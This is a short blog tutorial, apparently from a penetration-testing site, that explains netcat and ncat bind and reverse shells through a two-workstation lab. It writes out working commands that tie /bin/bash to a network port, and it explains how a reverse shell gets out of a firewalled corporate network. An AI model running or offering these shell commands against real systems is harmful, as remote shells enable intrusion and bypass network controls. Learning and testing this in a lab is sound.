HOWTO Using Bind Shell and Reverse Shell

Now let’s review on how to use Bind Shell and Reverse Shell. You need to have two workstation for this exercise, the 1st PC (InsiderPC with IP is in your network and the 2nd PC (OutsiderPC with IP from the outside network.

Using Bind Shell, start this command from your OutsiderPC (Bob workstation).


nc -nvlp 5555 -e /bin/bash ;starting netcat with listening port 5555, of course you can use other port number and allowing the client (InsiderPC) to connect and execute bash shell command prompt. This is to prepare Bob’s workstation to listen using port 5555 so Alice can connect.

From the InsiderPC (Alice workstation), connect using the following command

nc -nv 5555 [Enter] the IP address is assigned to the OutsiderPC.

When you type “ifconfig” you will see the IP address of OutsiderPC. You are executing this command from the OutsiderPC.

This is to allow Alice to connect to Bob’s workstation to take control for administration purposes.

Now Reserve Shell. The difference is the client (InsiderPC) will provide the executable


file. Let’s begin by preparing our OutsiderPC to listen. In OutsiderPC, type the following command.

nc -nvlp 5555

From the InsiderPC, connect using the following command.

nc -nv 5555 -e /bin/bash [Enter] the IP address is assigned to the OutsiderPC (Bob’s workstation).

Alice is located in the corporate network with Firewall, she will not be able to accept connection coming from outside (Bob) though Alice can make outbound connection which allow her to connect to Bob’s workstation with the NETCAT connection tied to a local shell. Once this connection is made, Bob then will have access to Alice computer an her behalf. Similar to a remote access tool.

Using the OutsiderPC, type “ifconfig” you will see the InsiderPC ip address because you are using the InsiderPC (Alice) to execute the command.

Related: Learn Penetration Testing using Kali

Please note, using netcat is not encrypted. All transactions are in plain text. The NCAT tool will provide the encryption not available in netcat command. It’s a similar process when you use bind shell or reverse shell.

UPDATED: Here’s the command using NCAT encrypted session for bind shell.

# ncat -lvp 5555 -e /bin/bash –allow –ssl

where as -lvp listening to port 5555, -e /bin/bash (or -e cmd.exe for windows) bind shell, to –allow remote IP address to connect and using –ssl to encrypt the session.

To connect from remote PC with an IP address of, use the following command.

# ncat -v 5555 –ssl

where as to connect to remote PC that give us permission using port 5555 and –ssl for encrypted session.

And for the reverse bind shell, use these commands.

PC1 # ncat -lvp 5555 –allow –ssl

PC2 # ncat -v 5555 -e /bin/bash –ssl

You can use Wireshark or other snipping network traffic tool to check if your session is encrypted.

Always encrypt. Always secure.

Support @QUE.COM

Founder, QUE.COM Internet Media. | Founder, a Shout for Joy! | MAJ.COM Management of Assets and Joint Ventures. More at KING.NET Ideas to Life.

Leave a Reply